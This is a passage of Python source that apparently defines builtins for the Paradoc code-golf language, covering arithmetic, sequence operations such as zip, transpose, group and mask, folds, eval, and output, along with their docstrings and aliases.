to single-element lists; if at\n least one argument is a string, both coerce to strings).\"\"\",\n stability=\"unstable\")\n # }}}\n # Incr/Decr/First/Last/Uncons/Unsnoc/Parens: «»‹›() {{{\n def case_add_const(i: int) -> Case:\n return Case.number(lambda env, a: [num.pd_add_const(a, i)])\n\n decr_case = case_add_const(-1)\n incr_case = case_add_const(1)\n decr2_case = case_add_const(-2)\n incr2_case = case_add_const(2)\n\n cput('Decr', [], [decr_case ], docs=\"Decrease by 1.\", stability=\"beta\", golf_aliases=['('])\n cput('Incr', [], [incr_case ], docs=\"Increase by 1.\", stability=\"beta\", golf_aliases=[')'])\n cput('Decr_two', [], [decr2_case], docs=\"Decrease by 2.\", stability=\"beta\", golf_aliases=['«'])\n cput('Incr_two', [], [incr2_case], docs=\"Increase by 2.\", stability=\"beta\", golf_aliases=['»'])\n\n uncons_case = Case.seq(lambda env, a: [pd_butfirst(a), pd_first(a)])\n cput('Uncons', [], [uncons_case],\n docs=\"\"\"Split into tail and first.\n\n ex: [1 2 3]Uncons => 
[2 3]1\"\"\", stability=\"beta\",\n golf_aliases=['('])\n unsnoc_case = Case.seq(lambda env, a: [pd_butlast(a), pd_last(a)])\n cput('Unsnoc', [], [unsnoc_case],\n docs=\"\"\"Split into init and last.\n\n ex: [1 2 3]Uncons => [1 2]3\"\"\", stability=\"beta\",\n golf_aliases=[')'])\n modify_first_case = Case.block_seq_range(lambda env, b, seq: [pd_modify_index(env, b, pd_deref(seq), 0)])\n modify_last_case = Case.block_seq_range(lambda env, b, seq: [pd_modify_index(env, b, pd_deref(seq), -1)])\n\n cput('Modify_first', [], [modify_first_case],\n docs=\"\"\"Run a block over the first element of a list, then replace\n it in the list with the result.\"\"\",\n stability=\"beta\",\n golf_aliases=['('])\n cput('Modify_last', [], [modify_last_case],\n docs=\"\"\"Run a block over the last element of a list, then replace\n it in the list with the result.\"\"\",\n stability=\"beta\",\n golf_aliases=[')'])\n\n cput('Decr_or_uncons_or_modify_first', ['('],\n [decr_case, uncons_case, modify_first_case],\n docs=\"\"\"{{ 'Decr'|b }} or {{ 'Uncons'|b }} or\n {{ 'Modify_first'|b }}.\"\"\",\n stability=\"beta\")\n cput('Incr_or_unsnoc_or_modify_last', [')'],\n [incr_case, unsnoc_case, modify_last_case],\n docs=\"\"\"{{ 'Incr'|b }} or {{ 'Unsnoc'|b }} or\n {{ 'Modify_last'|b }}.\"\"\",\n stability=\"beta\")\n\n first_case = Case.seq(lambda env, a: [pd_first(a)])\n last_case = Case.seq(lambda env, a: [pd_last(a)])\n butlast_case = Case.seq(lambda env, a: [pd_butlast(a)])\n butfirst_case = Case.seq(lambda env, a: [pd_butfirst(a)])\n first_and_last_case = Case.seq(lambda env, a: [pd_index(a, 0), pd_index(a, -1)])\n\n cput('First', [], [first_case], docs=\"First of sequence\", stability=\"stable\", golf_aliases=['‹'])\n cput('Last', [], [last_case], docs=\"Last of sequence\", stability=\"stable\", golf_aliases=['›'])\n cput('Butlast', ['(s'], [butlast_case], docs=\"All but last of sequence\", stability=\"beta\")\n cput('Butfirst', [')s'], [butfirst_case], docs=\"All but first of sequence\", stability=\"beta\")\n cput('First_and_last', [], [first_and_last_case], docs=\"First and last of sequence\",\n stability=\"alpha\")\n\n floor_case = Case.number(lambda env, a: [num.pd_floor(a)])\n ceil_case = Case.number(lambda env, a: [num.pd_ceil(a)])\n round_case = Case.number(lambda env, a: [num.pd_round(a)])\n\n cput('Floor', ['i'], [ceil_case ], docs=\"Round up to the nearest integer.\", stability=\"beta\", golf_aliases=['›'])\n cput('Round', ['=i'], [round_case], docs=\"Round to the nearest integer; follows Python's rules.\",\n stability=\"alpha\")\n\n cput('Floor_or_first', ['‹'], [floor_case, first_case],\n docs=\"\"\"{{ 'Floor'|b }} or {{ 'First'|b }} of sequence or\n {{ 'Modify_first'|b }}\"\"\",\n stability=\"beta\")\n cput('Ceiling_or_last', ['›'], [ceil_case, last_case],\n docs=\"\"\"{{ 'Ceiling'|b }} or {{ 'Last'|b }} of sequence or\n {{ 'Modify_last'|b }}\"\"\",\n stability=\"beta\")\n\n cput('Decr_two_or_but_last', ['«'], [decr2_case, butlast_case],\n docs=\"\"\"Decrease by two, or all but last\"\"\",\n stability=\"beta\")\n\n cput('Incr_two_or_but_first', ['»'], [incr2_case, butfirst_case],\n docs=\"\"\"Increase by two, or all but first (tail)\"\"\",\n stability=\"beta\")\n\n cput('Round_or_first_and_last', ['¤' ], [round_case, first_and_last_case],\n stability=\"alpha\")\n\n cput('Complement_parity', ['~p'], [\n Case.value_n2v(lambda e: num.pd_xor_const(e, 1))\n ],\n stability=\"alpha\")\n # }}}\n # Sum, Product, etc {{{\n cput('Sum', ['Š', '+w'], [\n Case.seq_range(lambda env, x: [pd_deep_sum(x)]),\n ],\n 
docs=\"(Deep) sum (coerces numbers to range).\", stability=\"beta\")\n cput('Product', ['Þ', '*w'], [\n Case.seq_range(lambda env, x: [pd_deep_product(x)]),\n ],\n docs=\"(Deep) product (coerces numbers to range!?).\", stability=\"alpha\")\n cput('Deep_length', ['Dl'], [\n Case.value(lambda env, x: [pd_deep_length(x)]),\n ],\n docs=\"Deep length.\", stability=\"unstable\")\n cput('Average', ['Av'], [\n Case.seq_range(lambda env, x: [pd_deep_average(x)]),\n ],\n docs=\"Average (deep).\", stability=\"alpha\")\n cput('Standard_deviation', ['Sg'], [\n Case.seq_range(lambda env, x: [pd_deep_standard_deviation(x)]),\n ],\n docs=\"Standard deviation (deep). Mnemonic: sigma\", stability=\"alpha\")\n cput('Hypotenuse', ['Hy'], [\n Case.seq_range(lambda env, x: [pd_deep_hypotenuse(x)]),\n ],\n docs=\"Hypotenuse (square root of sum of squares; deep).\",\n stability=\"alpha\")\n # }}}\n # M for Minus (negate) and Mold {{{\n negate_case = Case.number(lambda env, a: [num.pd_mul_div_const(a, -1, 1)])\n mold_case = Case.value_seq(lambda env, x, y: [pd_mold(x, y)])\n memoize_case = Case.block(lambda env, b: [MemoizedBlock(b)])\n cput('Negate', [], [negate_case],\n docs=\"Negate a number.\", stability=\"beta\",\n golf_aliases=['M'])\n cput('Mold', [], [mold_case],\n docs=\"Mold the first sequence like the second.\", stability=\"alpha\",\n golf_aliases=['M'])\n cput('Mold_fill', ['Mf'], [Case.value_seq(lambda env, x, y: [pd_mold_fill(x, y)])],\n docs=\"\"\"Repeat the first element as many times as needed to mold a\n sequence like the second.\"\"\", stability=\"alpha\")\n cput('Memoize', ['Memo'], [memoize_case],\n docs=\"Memoize a block.\", stability=\"alpha\",\n golf_aliases=['M'])\n cput('Negate_or_mold_or_memoize', ['M'], [negate_case, memoize_case, mold_case],\n docs=\"\"\"{{ 'Negate'|b }} a number, or {{ 'Mold'|b }} a sequence\n like another, or {{ 'Memoize'|b }} a block.\"\"\",\n stability=\"alpha\")\n # }}}\n # U for Signum, Uniquify, Until {{{\n signum_case = Case.number(lambda env, a: [num.pd_signum(a)])\n uniquify_case = Case.seq(lambda env, a: [pd_seq_uniquify(a)])\n until_case = Case.block2(lambda env, cond, body:\n pd_while_then_empty_list(env, cond, body, negate=True))\n cput('Signum', [], [signum_case],\n docs=\"Signum of a number (-1, 0, 1) by sign.\", stability=\"beta\",\n golf_aliases=['U'])\n cput('Uniquify', [], [uniquify_case],\n docs=\"\"\"Uniquify a sequence: drop all but first occurrence of each\n element\"\"\",\n stability=\"alpha\",\n golf_aliases=['U'])\n cput('Until', [], [until_case],\n docs=\"\"\"Until loop: Execute first block, pop, stop if true, execute\n second block, repeat.\"\"\",\n stability=\"alpha\",\n golf_aliases=['U'])\n cput('Signum_or_uniquify_or_until', ['U'], [signum_case, uniquify_case, until_case],\n docs=\"Signum or uniquify or until. Mnemonic: U for Unit\",\n stability=\"alpha\")\n # }}}\n # Has as factor / count {{{\n cput('Count_maybe_factors', ['#'], [\n Case.number2(lambda env, a, b: [num.pd_count_multiplicity_in(b, a)]),\n Case.seq_value(lambda env, s, x: [pd_count_in(env, x, s)]),\n Case.block_seq_range(lambda env, b, s: [pd_count(env, b, s)]),\n ],\n docs=\"\"\"Count factor multiplicity, frequency, or number satisfying\n predicate. 
Mnemonic: number sign, as in you're counting the number\n of something\"\"\",\n stability=\"beta\")\n cput('Count_pairs', ['#p'], [\n Case.seq(lambda env, seq: [pd_count_pairs(seq)]),\n ],\n docs=\"\"\"Given a sequence, return a list of pairs, each pair with\n a distinct element and the number of times it appears in the\n sequence.\"\"\",\n stability=\"alpha\")\n cput('Most_frequent', ['#æ'], [\n Case.seq(lambda env, seq: [pd_most_frequent(seq)]),\n ],\n docs=\"\"\"Most frequently appearing element.\"\"\",\n stability=\"alpha\")\n cput('Least_frequent', ['#œ'], [\n Case.seq(lambda env, seq: [pd_least_frequent(seq)]),\n ],\n docs=\"\"\"Least frequently appearing element.\"\"\",\n stability=\"alpha\")\n # }}}\n # Down/Do, Transpose, Zip {{{\n reverse_case = Case.seq_range_deref(lambda env, a: [a[::-1]])\n doloop_case = Case.block(lambda env, body: pd_do_then_empty_list(env, body))\n cput('Reverse', ['Down'], [reverse_case, doloop_case],\n docs=\"\"\"Reverse a sequence (coerces numbers to range).\"\"\",\n stability=\"beta\",\n golf_aliases=['D'])\n cput('Doloop', [], [doloop_case],\n docs=\"\"\"Do loop: execute the block, then pop an element, and repeat\n until the popped element is falsy.\"\"\",\n stability=\"beta\",\n golf_aliases=['D'])\n cput('Reverse_or_doloop', ['Down_or_doloop', 'D'], [reverse_case, doloop_case],\n docs=\"\"\"On a number of a sequence, {{ 'Reverse'|b }}; on a block,\n {{ 'Doloop'|b }}.\"\"\",\n stability=\"beta\")\n cput('Reverse_one_or_map', ['Ð'], [\n Case.number(lambda env, n: [range(num.intify(n), 0, -1)]),\n Case.seq_range(lambda env, a: [pd_map_reverse_singleton(a)]),\n ],\n docs=\"\"\"On numbers, reverse inclusive range from that number to\n 1 (i.e. {{ 'Range_one_down'|b }}). On sequences, reverse each element\n (numbers coerce to length-1 lists, and characters coerce to\n length-1 strings, so you can also use this to wrap each element of\n a flat list into a list). (Heavily inspired by studying\n 05AB1E.)\"\"\",\n stability=\"alpha\")\n cput('Palindromize', ['Pz'], [\n Case.seq_range(lambda env, a: [pd_palindromize(a)]),\n ],\n docs=\"\"\"Concatenate a with the tail of its reverse.\"\"\",\n stability=\"alpha\")\n cput('Rectangularize', ['Qz'], [\n Case.seq_value(lambda env, a, f: [pd_rectangularize_fill(a, f)]),\n ],\n docs=\"\"\"Rectangularize a matrix: append the filler element as\n necessary to rows until the matrix is rectangular. Mnemonic: Q for\n Quadrangle.\"\"\",\n stability=\"alpha\")\n cput('Rectangularize_with_space', [' q'], [\n Case.seq(lambda env, a: [pd_rectangularize_fill(a, Char(' '))]),\n ],\n docs=\"\"\"Rectangularize a matrix with spaces: append the space\n character as necessary to rows until the matrix is rectangular.\n Mnemonic: Q for Quadrangle.\"\"\",\n stability=\"alpha\")\n cput('Transpose', ['Tt', '™'], [\n Case.seq(lambda env, a: [pd_transpose(a)]),\n ],\n docs=\"\"\"Transpose a matrix, or list of lists. 
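# Illustrative sketch (not part of the scraped file): Palindromize, as
# documented above, concatenates a sequence with the tail of its reverse.
def palindromize_demo(s):
    return s + s[::-1][1:]

assert palindromize_demo("abc") == "abcba"
assert palindromize_demo([1, 2]) == [1, 2, 1]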
Mnemonic: matrices\n are transposed by a superscript T, so Tt is just that \"doubled\" and\n ™ is \"Transpose Matrix\" superscripted.\"\"\",\n stability=\"beta\")\n cput('Rotate', ['Ro'], [\n Case.seq(lambda env, a: [pd_transpose(a)[::-1]]),\n ],\n docs=\"\"\"Rotate a matrix, or list of lists, 90 degrees\n counterclockwise (just by vague mathematical convention of\n angle).\"\"\",\n stability=\"alpha\")\n cput('Unrotate', ['Ur'], [\n Case.seq(lambda env, a: [pd_transpose(pd_deref(a)[::-1])]),\n ],\n docs=\"\"\"Rotate a matrix, or list of lists, 90 degrees clockwise\n (just by vague mathematical convention of angle).\"\"\",\n stability=\"alpha\")\n cput('Transpose_fill', ['Tf'], [\n Case.seq_value(lambda env, a, f: [pd_transpose_fill(a, f)]),\n ],\n docs=\"\"\"Given a filler element, transpose a matrix, or list of\n lists, with the filler element repeated as necessary until the\n matrix is rectangular.\"\"\",\n stability=\"alpha\")\n cput('Transpose_fill_with_space', [' t'], [\n Case.seq(lambda env, a: [pd_transpose_fill(a, Char(' '))]),\n ],\n docs=\"\"\"Transpose a matrix, or list of lists (or of strings),\n adding the space character as necessary until the matrix is\n rectangular.\"\"\",\n stability=\"alpha\")\n cput('Zip', ['Zp'], zip_cases,\n docs=\"\"\"Zip two sequences (numbers coerce to ranges), returning a\n list of length-2 lists; or zip them with a block, which operates on\n corresponding pairs of the two lists. Truncates to the length of\n the shorter input sequence. Also see {{ 'zip'|it }}, and\n {{ '‰'|b }} for an alias.\"\"\",\n stability=\"alpha\")\n cput('Ziplongest', ['Zl'], [\n Case.seq2_range(lambda env, a, b: [pd_ziplongest_as_list(a, b)]),\n Case.seq2_range_block(lambda env, a, b, block: [pd_ziplongest(env, block, a, b)]),\n ],\n docs=\"\"\"Zip two sequences (numbers coerce to ranges), returning a\n list of length-2 or (at indices between their lengths, if the\n sequences are of unequal length) length-1 lists; or zip them with a\n block, which operates on corresponding pairs of the two lists,\n where elements of the longer list are collected unmodified. The\n result has length equal to that of the longest list.\"\"\",\n stability=\"alpha\")\n cput('Autozip', ['Az'], [\n Case.seq_range(lambda env, seq: [pd_sliding_window_seq(seq, 2)]),\n Case.block_seq_range(lambda env, block, a: [pd_autozip(env, block, a)]),\n ],\n docs=\"\"\"Collect the list of adjacent pairs of elements of a list\n (coerces numbers to ranges); or map a block across these pairs,\n which is equivalent to zipping the list with its own tail.\"\"\",\n stability=\"alpha\")\n cput('Loopzip', ['Oz'], [\n Case.seq2_range(lambda env, a, b: [pd_loopzip_as_list(a, b)]),\n Case.seq2_range_block(lambda env, a, b, block: [pd_loopzip(env, block, pd_deref_to_iterable(a), pd_deref_to_iterable(b))]),\n ],\n docs=\"\"\"Zip two sequences (numbers coerce to ranges), returning a\n list of length-2 lists; or zip them with a block, which operates on\n corresponding pairs of the two lists. The result has length equal\n to that of the longest list; the shorter list, if one exists, is\n looped until it is the right length. 
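# Illustrative sketch (not part of the scraped file): the Loopzip
# behaviour described above, cycling the shorter input to full length.
from itertools import cycle, islice

def loopzip_demo(a, b):
    n = max(len(a), len(b))
    return list(zip(islice(cycle(a), n), islice(cycle(b), n)))

assert loopzip_demo([1, 2, 3, 4], "ab") == [(1, 'a'), (2, 'b'), (3, 'a'), (4, 'b')]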
Mnemonic: O looks like a\n loop.\"\"\",\n stability=\"alpha\")\n\n pow10_case = Case.number(lambda env, n: [10 ** num.numerify(n)])\n cput('Power_of_ten', [], [pow10_case], stability=\"alpha\", golf_aliases=['€'])\n\n mask_case = Case.seq2_range(lambda env, seq1, seq2: [pd_mask(seq1, seq2)])\n cput('Mask', [], [mask_case],\n docs=\"\"\"Mask: Zip two sequences and filter for elements of the first\n where the corresponding elements of the second are truthy.\"\"\",\n stability=\"alpha\", golf_aliases=['€'])\n bimask_case = Case.seq2_range(lambda env, seq1, seq2: [\n pd_mask(seq1, seq2, negate=True), pd_mask(seq1, seq2)])\n cput('Bimask', [], [bimask_case],\n docs=\"\"\"Bimask: Zip two sequences and push two filtered versions of\n the first sequence, one of elements where the corresponding\n elements of the second are falsy, and one of the remaining.\"\"\",\n stability=\"alpha\", golf_aliases=['¥'])\n\n cput('€', [], [pow10_case, mask_case],\n docs=\"\"\"{{ 'Power_of_ten'|b }} or {{ 'Mask'|b }}. Mnemonics: E for\n exponent, the one in scientific notation, or the powers of ten in\n the relatively European metric system; or € has the = like\n indexing; it's indexing by a list of booleans.\"\"\",\n stability=\"unstable\")\n cput('¥', [], [bimask_case],\n docs=\"\"\"{{ 'Bimask'|b }}. Mnemonics: like {{ '\\u20ac'|b }} but it\n \"forks\" the sequence into two instead of just having the truthy\n ones.\"\"\",\n stability=\"unstable\")\n # }}}\n # Matching prefixes, mismatched suffixes {{{\n cput('Matching_prefix', ['Shared_prefix', 'Ys', 'Ym'], [\n Case.seq2_range(lambda env, s1, s2: [pd_matching_prefix(s1, s2)]),\n ],\n docs=\"\"\"Find the longest prefix shared between two sequences.\n Mnemonic for this and related operations: Y is a fork where the\n bottom is the shared prefix and the top are the diverging\n suffixes. 's' is for same or shared.\"\"\",\n stability=\"alpha\")\n cput('Mismatch_suffixes', ['Yd'], [\n Case.seq2_range(lambda env, s1, s2: pd_mismatch_suffixes(s1, s2)),\n ],\n docs=\"\"\"Find the suffixes after the longest prefix shared between\n two sequences. Mnemonic for this and related operations: Y is a\n fork where the bottom is the shared prefix and the top are the\n diverging suffixes. 'd' is for different or diverging.\"\"\",\n stability=\"alpha\")\n cput('Mismatch_index', ['Yi'], [\n Case.seq2_range(lambda env, s1, s2: [pd_mismatch_index(s1, s2)]),\n ],\n docs=\"\"\"Find the length of the longest prefix shared\n between two sequences; equivalently, the index of the first element\n where they diverge, except that it'll be the length of the list if\n they are identical. Mnemonic for this and related operations: Y is\n a fork where the bottom is the shared prefix and the top are the\n diverging suffixes; 'i' is for index.\"\"\",\n stability=\"alpha\")\n cput('Mismatch_pair', ['Yp'], [\n Case.seq2_range(lambda env, s1, s2: [pd_mismatch_elements(s1, s2)]),\n ],\n docs=\"\"\"Find the first elements after the longest prefix shared\n between two sequences. Returns a list. If the two sequences are\n equal, the list will be empty. If one sequence is a proper prefix\n of the other, the list will just have one element (and you won't be\n able to tell which sequence it came from). 
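# Illustrative sketch (not part of the scraped file): Mask/Bimask above
# filter the first sequence by the truthiness of the second, pairwise.
def mask_demo(seq, flags, negate=False):
    return [x for x, f in zip(seq, flags) if bool(f) != negate]

assert mask_demo("abcd", [1, 0, 1, 0]) == ['a', 'c']
assert mask_demo("abcd", [1, 0, 1, 0], negate=True) == ['b', 'd']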
Mnemonic for this and\n related operations: Y is a fork where the bottom is the shared\n prefix and the top are the diverging suffixes; 'p' is for pair,\n which the return value usually is.\"\"\",\n stability=\"alpha\")\n cput('Mismatch_former', ['Yf', 'Ya'], [\n Case.seq2_range(lambda env, s1, s2: [pd_mismatch_element(0, s1, s2)]),\n ],\n docs=\"\"\"Given two sequences, find the first element in the first\n sequence that isn't at the corresponding index in the second.\n Errors if there isn't such an element. Mnemonic for this and\n related operations: Y is a fork where the bottom is the shared\n prefix and the top are the diverging suffixes; 'f' is for 'former'\n / 'a' is the first letter of the alphabet.\"\"\",\n stability=\"unstable\")\n cput('Mismatch_latter', ['Yl', 'Yb'], [\n Case.seq2_range(lambda env, s1, s2: [pd_mismatch_element(1, s1, s2)]),\n ],\n docs=\"\"\"Given two sequences, find the first element in the second\n sequence that isn't at the corresponding index in the second.\n Errors if there isn't such an element. Mnemonic for this and\n related operations: Y is a fork where the bottom is the shared\n prefix and the top are the diverging suffixes; 'l' is for 'latter'\n / 'b' is the second letter of the alphabet.\"\"\",\n stability=\"unstable\")\n # }}}\n # Reduce/join {{{\n cput('Reduce', ['R'], [\n Case.seq2_singleton(lambda env, seq, joiner: [pd_join(env, seq, joiner)]),\n Case.block_seq_range(lambda env, block, seq: [pd_reduce(env, block, seq)]),\n ],\n stability=\"beta\")\n line_join_case = Case.seq_range(lambda env, seq:\n ['\\n'.join(env.pd_str(e) for e in pd_iterable(seq))])\n cput('Line_join', ['\\nr', '\\\\nr'], [line_join_case],\n docs=\"Join with newlines\",\n stability=\"beta\")\n cput('Ŋ', ['\\x0e'], [line_join_case],\n docs=\"Unstable aliases for {{ 'Line_join'|b }}.\",\n stability=\"unstable\")\n cput('Space_join', [' r'], [\n Case.seq_range(lambda env, seq: [' '.join(env.pd_str(e) for e in pd_iterable(seq))]),\n ],\n stability=\"beta\")\n cput('Comma_join', [',r'], [\n Case.seq_range(lambda env, seq: [','.join(env.pd_str(e) for e in pd_iterable(seq))]),\n ],\n stability=\"unstable\")\n # }}}\n # G for Gcd or group, and friends {{{\n cput('Group', [], [\n Case.seq(lambda env, seq: [pd_group(seq)]),\n ],\n docs=\"\"\"Group into runs of equal elements.\n\n ex: [3 1 2 2 1 1 1]G => [[3][1][2 2][1 1 1]]\"\"\",\n stability=\"beta\",\n golf_aliases=['G'])\n cput('Group_by', [], [\n Case.block_seq_range(lambda env, block, seq: [pd_group_by(env, block, seq)]),\n ],\n docs=\"Group into runs of equal elements according to the block\",\n stability=\"beta\",\n golf_aliases=['G'])\n cput('Gcd', [], [\n Case.number2(lambda env, a, b: [num.pd_gcd(a, b)]),\n ],\n stability=\"beta\")\n cput('Group_maybe_by', ['G'], [\n Case.seq(lambda env, seq: [pd_group(seq)]),\n Case.number2(lambda env, a, b: [num.pd_gcd(a, b)]),\n Case.block_seq_range(lambda env, block, seq: [pd_group_by(env, block, seq)]),\n ],\n docs=\"\"\"GCD; group like elements of a sequence, possibly under a\n mapping.\"\"\",\n stability=\"beta\")\n cput('Lcm', [], [\n Case.seq(lambda env, seq: [functools.reduce(num.pd_lcm, pd_flatten_to_int_char_generator(seq)) if len(seq) else (Char(1) if seq == \"\" else 1)]),\n Case.number2(lambda env, a, b: [num.pd_lcm(a, b)]),\n ],\n stability=\"unstable\",\n docs=\"\"\"LCM of two numbers, or of a list, deeply.\"\"\")\n\n cput('Organize', [], [\n Case.seq(lambda env, seq: [pd_organize(seq)]),\n Case.block_seq_range(lambda env, block, seq: [pd_organize_by(env, block, seq)]),\n 
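# Illustrative sketch (not part of the scraped file): Group above splits
# a list into maximal runs of equal adjacent elements, matching its doc
# example.
from itertools import groupby

def group_demo(seq):
    return [list(g) for _, g in groupby(seq)]

assert group_demo([3, 1, 2, 2, 1, 1, 1]) == [[3], [1], [2, 2], [1, 1, 1]]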
],\n docs=\"\"\"Group into lists of equal elements; like {{ 'Group'|b }},\n but the equal elements don't need to be consecutive. The lists come\n in the same order that their elements' first appearances did in the\n original list.\n\n ex: [3 1 2 2 1 1 1]Organize => [[3][1 1 1 1][2 2]]\"\"\",\n stability=\"alpha\",\n golf_aliases=['Ø'])\n cput('Organize_or_totient', ['Ø'], [\n Case.number(lambda env, a: [discrete.totient(a)]),\n Case.seq(lambda env, seq: [pd_organize(seq)]),\n Case.block_seq_range(lambda env, block, seq: [pd_organize_by(env, block, seq)]),\n ],\n docs=\"\"\"On numbers, Euler's {{ 'Totient'|b }} function (does not\n vectorize). On sequences or blocks with sequences, {{ 'Organize'|b }}.\"\"\",\n stability=\"alpha\")\n # }}}\n # Circumflexed vowels {{{\n even_case = Case.number(lambda env, n: [int(num.realify(n) % 2 == 0)])\n odd_case = Case.number(lambda env, n: [int(num.realify(n) % 2 == 1)])\n cput('Even', ['Ev'], [even_case], stability=\"alpha\")\n cput('Odd', ['Od'], [odd_case], stability=\"alpha\")\n def all_fold_f(es: Optional[List[PdObject]]) -> Optional[bool]:\n if es is None:\n return True\n else:\n for e in es:\n if not e: return False\n return None\n def any_fold_f(es: Optional[List[PdObject]]) -> Optional[bool]:\n if es is None:\n return False\n else:\n for e in es:\n if e: return True\n return None\n def make_all_and_exists_fold_f() -> Callable[[Optional[List[PdObject]]], Optional[bool]]:\n exists = False\n def f(es: Optional[List[PdObject]]) -> Optional[bool]:\n nonlocal exists\n if es is None:\n return exists\n else:\n for e in es:\n if not e: return False\n exists = True\n return None\n return f\n def make_unique_fold_f() -> Callable[[Optional[List[PdObject]]], Optional[bool]]:\n s: Set[PdObject] = set()\n def f(es: Optional[List[PdObject]]) -> Optional[bool]:\n if es is None:\n return True\n else:\n for e in es:\n if e in s: return False\n else: s.add(e)\n return None\n return f\n def make_identical_fold_f() -> Callable[[Optional[List[PdObject]]], Optional[bool]]:\n obj: Optional[PdObject] = None\n def f(es: Optional[List[PdObject]]) -> Optional[bool]:\n nonlocal obj\n if es is None:\n return True\n else:\n for e in es:\n if obj is None: obj = e\n elif obj != e: return False\n return None\n return f\n def all_and_exists(seq: Iterable[object]) -> bool:\n exists = False\n for e in seq:\n if not e: return False\n exists = True\n return exists\n all_cases = [\n Case.seq(lambda env, a: [int(all(pd_iterable(a)))]),\n Case.block_seq_range(lambda env, block, seq:\n [int(pd_map_fold_into(env, block, seq, all_fold_f))]),\n ]\n any_cases = [\n Case.seq(lambda env, a: [int(any(pd_iterable(a)))]),\n Case.block_seq_range(lambda env, block, seq:\n [int(pd_map_fold_into(env, block, seq, any_fold_f))]),\n ]\n all_and_exists_cases = [\n Case.seq(lambda env, a: [int(all_and_exists(pd_iterable(a)))]),\n Case.block_seq_range(lambda env, block, seq:\n [int(pd_map_fold_into(env, block, seq, make_all_and_exists_fold_f()))]),\n ]\n not_all_cases = [\n Case.seq(lambda env, a: [int(not all(pd_iterable(a)))]),\n Case.block_seq_range(lambda env, block, seq:\n [int(not pd_map_fold_into(env, block, seq, all_fold_f))]),\n ]\n not_any_cases = [\n Case.seq(lambda env, a: [int(not any(pd_iterable(a)))]),\n Case.block_seq_range(lambda env, block, seq:\n [int(not pd_map_fold_into(env, block, seq, any_fold_f))]),\n ]\n identical_cases = [\n Case.seq(lambda env, a: [int(pd_seq_is_identical(a))]),\n Case.block_seq_range(lambda env, block, seq:\n [int(pd_map_fold_into(env, block, seq, 
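# Illustrative sketch (not part of the scraped file): Organize above is
# Group without the adjacency requirement; an insertion-ordered dict
# keeps the groups in order of first appearance (hashable elements
# assumed for this demo).
def organize_demo(seq):
    groups = {}
    for e in seq:
        groups.setdefault(e, []).append(e)
    return list(groups.values())

assert organize_demo([3, 1, 2, 2, 1, 1, 1]) == [[3], [1, 1, 1, 1], [2, 2]]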
make_identical_fold_f()))]),\n ]\n unique_cases = [\n Case.seq(lambda env, a: [int(pd_seq_is_unique(a))]),\n Case.block_seq_range(lambda env, block, seq:\n [int(pd_map_fold_into(env, block, seq, make_unique_fold_f()))]),\n ]\n cput('All', ['Al'], all_cases, stability=\"beta\", golf_aliases=['Â'])\n cput('Any', ['An'], any_cases, stability=\"beta\", golf_aliases=['Ê'])\n cput('All_and_exists', ['Ae'], all_and_exists_cases, stability=\"alpha\")\n cput('Not_all', ['Na'], not_all_cases, stability=\"beta\")\n cput('Not_any', ['Not_exists', 'Ne'], not_any_cases, stability=\"beta\", golf_aliases=['Ô'])\n cput('Identical', ['=p'], identical_cases, stability=\"beta\", golf_aliases=['Î'])\n cput('Unique', [], unique_cases, stability=\"beta\", golf_aliases=['Û'])\n cput('Above_zero_or_all', ['Â'], [\n Case.number(lambda env, a: [int(num.realify(a) > 0)])\n ] + all_cases,\n docs=\"Above zero or All\", stability=\"beta\")\n cput('Even_or_any', ['Ê'], [even_case] + any_cases,\n docs=\"Even or Any (Exists)\", stability=\"beta\")\n cput('Equals_one_or_identical', ['Î'], [\n Case.number(lambda env, a: [int(num.numerify(a) == 1)]),\n ] + identical_cases,\n docs=\"Identity (equals 1) or Identical\", stability=\"beta\")\n cput('Odd_or_not_any', ['Ô'], [odd_case] + not_any_cases,\n docs=\"Odd or Not_any\", stability=\"beta\")\n cput('Under_zero_or_is_unique', ['Û'], [\n Case.number(lambda env, a: [int(num.realify(a) < 0)]),\n ] + unique_cases,\n docs=\"Under zero or Unique (test)\", stability=\"beta\")\n # }}}\n # Tilde and Eval {{{\n @put('Compl_or_eval_or_expand', '~',\n docs=\"\"\"Bitwise complement of integers. Expand lists or strings\n onto the stack, pushing each element separately in order. Eval on a\n block.\"\"\",\n stability=\"beta\")\n def tilde(env: Environment) -> None:\n a = env.pop()\n if isinstance(a, Block):\n a(env)\n elif isinstance(a, (str, list, range, Hoard)):\n env.push(*pd_iterable(a))\n elif isinstance(a, int):\n env.push(~a)\n else:\n raise NotImplementedError\n\n @put('Eval', 'Pd', docs=\"Evaluate a string as Paradoc code\", stability=\"alpha\")\n def pd_eval(env: Environment) -> None:\n a = env.pop()\n if isinstance(a, str):\n env.evaluate(a, set_quine=False) # (?)\n else:\n raise NotImplementedError\n\n @put('Quine_output', 'Qo', docs=\"Output the value of Qn, which will usually be the current program\", stability=\"alpha\")\n def quine_output(env: Environment) -> None:\n print(env.pd_str(env.get('Qn')), end=\"\")\n\n @put('Quine_print', 'Qp', docs=\"Print the value of Qn, which will usually be the current program\", stability=\"alpha\")\n def quine_print(env: Environment) -> None:\n env.print_output_record(env.pd_str(env.get('Qn')))\n # }}}\n # Input, output, and debugging {{{\n @put('Read_input', 'V',\n docs=\"\"\"Read something from standard input, as determined by the\n current input trigger.\"\"\",\n stability=\"alpha\")\n def read_input(env: Environment) -> None:\n e = env.run_input_trigger()\n if e is None:\n raise Exception('No more input!')\n else:\n env.push(e)\n\n @put('Output', 'O',\n docs=\"\"\"Output to standard output.\"\"\",\n stability=\"beta\")\n def pd_output(env: Environment) -> None:\n a = env.pop()\n print(env.pd_str(a), end=\"\")\n\n @put('Print', 'P',\n docs=\"\"\"Output to standard output, followed by an output record\n separator.\"\"\",\n stability=\"beta\")\n def pd_print(env: Environment) -> None:\n a = env.pop()\n env.print_output_record(env.pd_str(a))\n\n @put('Print_lines', 'Pl',\n docs=\"\"\"Output each element of a sequence to standard output, 
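# Illustrative sketch (not part of the scraped file): the dispatch-by-
# runtime-type pattern used by builtins like '~' above, reduced to its
# essence.
def tilde_demo(a):
    if isinstance(a, int):
        return ~a           # bitwise complement of integers
    if isinstance(a, (str, list, range)):
        return list(a)      # "expand" a sequence into its elements
    raise NotImplementedError

assert tilde_demo(5) == -6
assert tilde_demo("ab") == ['a', 'b']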
